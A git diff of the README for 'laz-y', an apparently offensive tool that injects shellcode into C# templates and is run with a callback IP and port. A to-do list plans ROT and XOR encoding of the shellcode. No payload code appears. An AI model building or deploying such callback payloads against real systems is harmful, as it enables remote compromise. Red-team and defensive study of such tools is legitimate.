Nariod/laz-y/README.md

 * `pip3 install -r requirements.txt`

 ## Usage
-* Add CS templates in the "templates" folder
+* Add your CS templates in the "templates" folder
-* Add the mark "!!!
-FIND ME PYTHON, PLZ !!!" in the templates, where you want your shellcode to be injected
+* Add the mark `!!!
+FIND ME PYTHON, PLZ !!!` in the templates, where you want the shellcode to be injected
-* run the script with "python3 laz-y.py -l CALLBACK_IP -p CALLBACK_PORT"
+* Run the script with `python3 laz-y.py -l CALLBACK_IP -p CALLBACK_PORT`

+## To do
+- [x] Basic mark for shellcode swaping
+- [ ] Add ROT encoding support
+- [ ] Add XOR encoding support

 ## Credits
 * Stackoverflow